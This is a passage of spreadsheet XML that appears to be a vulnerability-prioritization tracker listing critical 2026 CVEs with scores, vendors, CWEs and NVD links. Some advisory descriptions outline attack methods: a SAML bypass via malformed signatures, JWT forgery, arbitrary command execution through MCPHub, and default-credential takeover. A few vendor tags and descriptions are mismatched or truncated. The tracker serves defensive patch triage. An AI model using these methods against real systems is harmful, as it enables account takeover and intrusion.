      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R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S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62815</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.Native.Quic.MsQuic.OpenSSL, nuget:Microsoft.Native.Quic.MsQuic.Schannel</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>2.4.19, 2.5.10</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77995</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - miniorange.com - Arbitrary account takeover in miniOrange OAuth Client &lt; 3.2.0, OAuth Single Sign-On – OIDC SSO &lt; 1.2.2, Login with Keycloak OAuth Single Sign-On (SSO) &lt; 1.2.2, Single Sign-On for Educational Institutes &lt; 1.2.2 - The manipulation of a cookie value allows actors to login as arbitrary accounts, including admins.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77995</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77998</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - miniorange.com - Unauthenticated Authentication Bypass via SAMLResponse Parameter in miniOrange SAML SSO &lt; 11.0.2, SAML SP Single Sign On – Login with ADFS &lt; 6.4,  SAML SP Single Sign On – SAML SSO login with Google Apps &lt; 6.4 - This is due to the mo_saml_validate_signature() function performing a loose boolean check on the raw tri-state integer returned by PHP's openssl_verify(), causing an error return value of -1 to be evaluated as truthy and therefore treated as a successful signature verification. This makes it possible for unauthenticated attackers to log in as any existing Joomla user, including administrators, by submitting a crafted SAMLResponse containing an attacker-controlled NameID and a deliberately malformed signature value that triggers an OpenSSL processing error — bypassing verification entirely and resulting in wp_set_auth_cookie() being called for the targeted account.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77998</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26084</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79748</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 0.12.15, the POST /api/servers and PUT /api/servers/:name endpoints in MCPHub create/update MCP server configurations and then immediately spawn the configured stdio process via child_process.spawn. Authentication is required, but there is no authorization check restricting these endpoints to admins, and there is no allowlist/sanitization on the command and args fields. As a result, any authenticated non-admin user can submit a server configuration with command:"/bin/sh" (or any other binary) and arbitrary args, causing MCPHub to execute the attacker-controlled process as the MCPHub server's OS user (commonly root in the published Docker image and in npx/systemd deployments). This issue has been patched in version 0.12.15.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79748</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86464</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>kubernetes, docker, postgresql, keycloak</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>In the current development version of Eclipse aeriOS, for which no official release has yet been published, the Identity Manager (IdM) deployment included insecure default configurations and credentials for security-sensitive services.
The Helm chart exposed the Keycloak service and its PostgreSQL backing database through Kubernetes NodePort services by default, while the Docker Compose deployment similarly exposed PostgreSQL on all network interfaces. The deployment included fixed default credentials for the Keycloak administrator and PostgreSQL database user, and the previous Helm chart configuration did not provide adequate secret management for these credentials. In addition, predefined application users with known credentials were provided for development and testing without sufficiently warning operators against their use in production environments.
An attacker able to reach the exposed services could use the published default credentials to obtain administrative access to the Identity Manager or direct access to its database. This could allow unauthorized access to or modification of identity-management data, including users, roles, client credentials, sessions, and cryptographic material, and could enable the creation of privileged identities or tokens accepted by other aeriOS components.
The issue has been addressed by generating a random Keycloak administrator password by default, managing Keycloak and PostgreSQL credentials through Kubernetes Secrets, and restricting PostgreSQL to an internal service in both the Helm chart and Docker Compose deployment. OpenLDAP is also restricted to an internal service. The predefined users intended for development and testing are retained, but the documentation now explicitly warns that their default credentials must not be used in production and that these users should be removed or their credentials changed after installation.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13447</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>The Mstore Api plugin for WordPress is vulnerable to Authentication Bypass via JWT Forgery in versions up to, and including, 4.20.0 This is due to missing cryptographic signature verification in the FirebasePhoneAuthHelper::verify_id_token() function, which decodes and validates Firebase ID token claims (alg, kid, aud, iss) but never calls openssl_verify() or any equivalent to validate the JWT signature against Google's actual public key certificates. This makes it possible for unauthenticated attackers to forge a Firebase Phone Auth JWT signed with a self-generated RSA key pair and impersonate any phone number, resulting in unauthorized access to existing WordPress accounts or creation of new arbitrary accounts.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13447</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58240</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-308</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Message Server does not sufficiently validate the authenticity of internal application server components during registration. An unauthenticated attacker with network access to the affected service could exploit this weakness to register an unauthorized component and potentially perform unauthorized actions within the application environment, resulting in a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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8" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69463</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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9" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69525</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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0" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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1" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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3" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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 s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
